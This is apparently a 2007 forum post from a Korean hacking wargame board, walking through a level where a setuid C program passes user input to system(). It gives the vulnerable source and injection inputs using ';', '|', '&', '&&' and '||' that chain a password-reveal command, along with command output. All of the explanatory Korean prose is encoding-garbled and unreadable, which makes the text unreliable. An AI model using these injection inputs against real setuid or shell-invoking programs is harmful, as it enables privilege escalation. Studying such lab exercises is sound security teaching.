http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2435 [º¹»ç]
ÀÚ ´ÙÀ½Àº ·¹º§3ÀÇ Á¤¼®ÀûÀÎ Ç®ÀÌÀÔ´Ï´Ù.
Âü°íÇϼ¼¿ä
¿ì¼± ·¹º§4ÀÇ setuid°¡ °É¸° ÆÄÀÏÀ» ã½À´Ï´Ù.
[level3@ftz level3]$ find / -perm -04000 -group level3 2> /dev/null
/bin/autodig
[level3@ftz level3]$ ls -al /bin/autodig
-rwsr-x--- 1 level4 level3 22931 3¿ù 29 2003 /bin/autodig
À̹ø ·¹º§Àº ¼Ò½ºÄڵ尡 ÁÖ¾îÁ® ÀÖ±º¿ä.
±×·¸´õ¶óµµ ¹ÙÀ̳ʸ® µð¹ö±ëÀº Çغ¼¼ö·Ï °æÇèÀÌ µÇ´Â°Ì´Ï´Ù.±ÇÀåÇÕ´Ï´Ù.
[level3@ftz level3]$ cat hint
´ÙÀ½ ÄÚµå´Â autodigÀÇ ¼Ò½ºÀÌ´Ù.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv){
char cmd[100];
if( argc!=2 ){
printf( "Auto Digger Version 0.9\n" );
printf( "Usage : %s host\n", argv[0] );
exit(0);
}
strcpy( cmd, "dig @" );
strcat( cmd, argv[1] );
strcat( cmd, " version.bind chaos txt");
system( cmd );
}
À̸¦ ÀÌ¿ëÇÏ¿© level4ÀÇ ±ÇÇÑÀ» ¾ò¾î¶ó.
more hints.
- µ¿½Ã¿¡ ¿©·¯ ¸í·É¾î¸¦ »ç¿ëÇÏ·Á¸é?
- ¹®ÀÚ¿ ÇüÅ·Π¸í·É¾î¸¦ Àü´ÞÇÏ·Á¸é?
=========================================================
ÀÌ ÇÁ·Î±×·¥Àº Àμö·Î ÁÖ¾îÁø µµ¸ÞÀÎÀÇ ³×ÀÓ¼¹ö ¹öÁ¯À»
ÀÚµ¿À¸·Î ¾Ë¾Æ³»µµ·Ï ¼¼ÆÃµÈ dig ÇÁ·Î±×·¥ÀÇ ²®µ¥±â±º¿ä.
ÇÁ·Î±×·¥ ÀÛÀÚ°¡ ÀǵµÇÑ Á¤»óÀûÀÎ °æ¿ì¸¦ ¸ÕÀú º¸¸é
ÈξÀ À̹ø ·¹º§ÀÇ ¾àÁ¡À» ¾Ë±â ½±½À´Ï´Ù.
´ÙÀ½Àº ±×³É digÀ¸·Î ³×ÀÓ¼¹öÀÇ ¹öÁ¯¹øÈ£¸¦ ¾Ë¾Æ³»´Â °æ¿ìÀÔ´Ï´Ù.
[level1@ftz level1]$ dig @hackerschool.org version.bind chaos txt
; <<>> DiG 9.2.1 <<>> @hackerschool.org version.bind chaos txt
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18229
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;version.bind. CH TXT
;; ANSWER SECTION:
version.bind. 0 CH TXT "9.2.1"
;; Query time: 60 msec
;; SERVER: 211.189.88.58#53(hackerschool.org)
;; WHEN: Sat Jul 14 17:44:42 2007
;; MSG SIZE rcvd: 48
===============================================================
À½ ÇØÄð ³×ÀÓ¼¹öÀÇ ¹öÁ¯Àº 9.2.1 À̱º¿ä :)
±×¸®°í ´ÙÀ½Àº dig ÇÁ·Î±×·¥ÀÇ Àμö 4°³Áß ¼¼°³¸¦ Àý¾àÇؼ µµ¸ÞÀÎ À̸§Çϳª¸¸ ³Ö¾îµµ
µÇµµ·Ï °£·«È½ÃŲ ¿ì¸®ÀÇ ·¹º§3 autodig ÇÁ·Î±×·¥ÀÔ´Ï´Ù.
[level3@ftz level3]$ /bin/autodig hackerschool.org
; <<>> DiG 9.2.1 <<>> @hackerschool.org version.bind chaos txt
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54691
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;version.bind. CH TXT
;; ANSWER SECTION:
version.bind. 0 CH TXT "9.2.1"
;; Query time: 40 msec
;; SERVER: 211.189.88.58#53(hackerschool.org)
;; WHEN: Sat Jul 14 17:55:53 2007
;; MSG SIZE rcvd: 48
=================================================================
ÀÌ·¸°Ô ¸¸ »ç¿ëÇÏ¸é ¾Æ¹«¹®Á¦ ¾ø°ÚÁö¸¸
¿ì¸®´Â ¾Æ·¡¿Í °°Àº »¹ÁþÀ» ÇÕ´Ï´Ù/
[level3@ftz level3]$ /bin/autodig "test;my-pass"
dig: Couldn't find server 'test': Name or service not known
Level4 Password is "***************".
=========================================================
¾î¶² ¿ø¸®·Î Æнº¿öµå°¡ ¹ñ¾îÁö´Â °É±î¿ä?
À§Ã³·³ ¸í·ÉÇà Àμö¸¦ ÁÖ¸é systemÀ¸·Î ½ÇÇàµÉ ¿ì¸® cmdÀÇ ±¸¼ºÀº
dig @test;my-pass version.bind chaos txt
°¡ µÇ¾î¼ ¿ø·¡ Àǵµ¸¸À¸·Î´Â µÞºÎºÐ 4°³°¡ ¸ðµÎ dig ÇÁ·Î±×·¥ÀÇ ¸í·ÉÇà Àμö·Î
°£ÁֵǾî¾ß ÇÏ°ÚÁö¸¸,
½ÇÁ¦·Î´Â ½© »ó¿¡¼ ; ±âÈ£´Â ¿©·¯ ¸í·ÉÀ» µ¿½Ã¿¡
½ÇÇàÇϵµ·Ï ÇØÁÖ´Â °¢ ¸í·ÉÀÇ ±¸ºÐ¼±°°Àº Ưº°ÇÑ Àǹ̸¦ °¡Áö°í ÀÖ¾î¼
;¸¦ ±âÁØÀ¸·Î ¾Õ µÚ µÎ°³ÀÇ ¸í·ÉÀ¸·Î ³ª´µ¾î¹ö¸³´Ï´Ù.
Áï
dig @test ¶ó´Â ¸í·É Çϳª,±×·¡¼ test¶ó´Â ¼¹ö¸¦ ¸øã°Ú´Ù°í ¿¡·¯¸¦ ³»ÁÒ.
¶Ç my-pass version.bind chaos txt ¶ó´Â Àμö¸¦ ¼¼°³ °®´Â ¸í·É Çϳª,
ÀÌ µÞºÎºÐ
my-pass°¡ ÁÖ¾îÁø Àμö ¼¼°³¿¡ °ü°è¾øÀÌ ÀÚ±âÇÒÀÏ(Æнº¿öµå¸¦ ¹ñ¾î³»´Â)
¸¸ ÇÏ°í exitÇعö¸®´Â °Å±¸¿ä.
==========================================
¶Ç ´Ù¸¥ ¿¹·Î¼
[level3@ftz level3]$ /bin/autodig "test|my-pass"
dig: Couldn't find server 'test': Name or service not known
Level4 Password is "***************".
ó·³ ¸í·É±¸ºÐÀÚ ; ´ë½Å pipe ±âÈ£ | ¸¦ ½áµµ ÀÌ ÆÄÀÌÇÁ ±âÈ£¸¦ ±âÁØÀ¸·Î
¾ÕµÚ·Î ¸í·ÉÀÌ ³ª´µ°í, ¾Õ¸í·ÉÀÇ °á°ú°¡ µÞ¸í·ÉÀ¸·Î Àü´ÞµÇ¸é¼ °°Àº È¿°ú°¡
»ý±â°Ô µË´Ï´Ù.
========================
[level3@ftz level3]$ /bin/autodig "test&my-pass"
ÀÇ °æ¿ìµµ ¸¶Âù°¡Áö..
±×·¯³ª && ³ª || ´Â Á¶±Ý ´Ù¸£ÁÒ.
[level3@ftz level3]$ /bin/autodig "hackerschool.org&&my-pass"
&& ÀÇ °æ¿ì ¾Õ ¸í·ÉÀÌ ¼º°øÇØ¾ß µÞ¸í·ÉÀ» ½ÇÇàÇϴϱî À§Ã³·³ÇØ¾ß ÇÕ´Ï´Ù.
[level3@ftz level3]$ /bin/autodig "test||my-pass"
ÀÇ °æ¿ì´Â ¾Õ ¸í·ÉÀÌ ½ÇÆÐÇØ¾ß µÞ¸í·ÉÀÌ ½ÇÇàµÇ´Ï±î ±×·¸±¸¿ä.
¤»¤» Àç¹ÕÁÒ?
Áï systemÇÔ¼ö·Î ½ÇÇàµÇ´Â cmd ¹®ÀÚ¿Àº °á±¹ ½©»ó¿¡¼ ½ÇÇàµÇ´Â ¸í·É¾î¶ó¼
½©¿¡ Ư¼öÇÑ Àǹ̸¦ °®´Â ±âÈ£ ; ¶óµç°¡ | ,&,&&,||¶óµç°¡ ¿¡ ¿µÇâÀ» ¹Þ°Ô µÇ´Â°ÍÀÔ´Ï´Ù.
|
Hit : 3550 Date : 2007/07/14 05:06
|